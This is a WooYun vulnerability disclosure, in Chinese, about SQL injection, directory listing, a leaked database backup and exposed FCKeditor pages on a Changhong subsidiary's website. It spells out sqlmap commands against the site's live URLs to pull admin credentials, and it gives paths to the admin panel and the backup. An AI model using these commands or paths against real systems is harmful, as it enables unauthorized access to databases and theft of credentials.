当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0175803

漏洞标题:电器安全之长虹电器子公司存在SQL注入、敏感信息泄露等多处漏洞(sqlmap无法判断数据库时, 无法找到管理表名时案例)

相关厂商:changhong.com

漏洞作者: crown丶prince

提交时间:2016-02-14 20:01

修复时间:2016-02-22 09:00

公开时间:2016-02-22 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-14: 细节已通知厂商并且等待厂商处理中
2016-02-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

电器安全之长虹电器子公司存在SQL注入、敏感信息泄露等多处漏洞(sqlmap无法判断数据库时案例)
PS: 四川长虹格润再生资源有限责任公司(以下简称“格润公司”)是四川长虹电器股份有限公司(以下简称四川长虹)旗下的控股子公司,成立于2010年6月;公司总部位于成都市金堂县,占地170余亩,总投资5亿元。

详细说明:

这是一次奇妙的旅程,首先是一个sql注入
【注入点】:
python sqlmap.py -u "http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274"
手工判断确认是注入了,但是sqlmap却无法判断注入点的数据库类型,也就是无法深入了

12.png


看到一堆not很郁闷,根据经验判断网站架构 和 sqlmap在判断Access的时候多进行了一步这两点
猜测数据库时Access
【更换语句】
python sqlmap.py -u "http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274" --dbms=access
【sqlmap表示也认同】

13.png


14.png


所以,don't give up
然后,没有后台,再次郁闷,可是:
【找后台】
通过目录遍历,http://www.gerunzs.com/products/
找到后台:http://www.gerunzs.com/gerun_admin/admin_index.asp
然后,没有管理员账号密码,又一次郁闷,可是:
【找管理员账号密码】
通过备份数据库泄露:
http://www.gerunzs.com/database/

15.png


下载后查看:
管理信息泄露

16.png


可是, 账号密码不对,还是进不去
但是,通过查看数据库,猜测数据库结构没有变,数据库的管理信息存放在ImgAdmin,尝试一下
【再次更换语句】
python sqlmap.py -u "http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274" --dbms=access -T "ImgAdmin" --columns
终于可以获得账号密码了,额,点到为止

17.png


【其他漏洞】
【1】FCK对外
http://www.gerunzs.com/fckeditor/
http://www.gerunzs.com/fckeditor/editor/
http://www.gerunzs.com/fckeditor/editor/filemanager/connectors/asp/
http://www.gerunzs.com/fckeditor/editor/dialog/
http://www.gerunzs.com/fckeditor/editor/filemanager/browser/default/browser.html
http://www.gerunzs.com/fckeditor/editor/filemanager/browser/default/frmupload.html
editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php
【2】目录遍历
http://www.gerunzs.com/test/
http://www.gerunzs.com/products/
http://www.gerunzs.com/images/

漏洞证明:

修复方案:

版权声明:转载请注明来源 crown丶prince@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-22 09:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无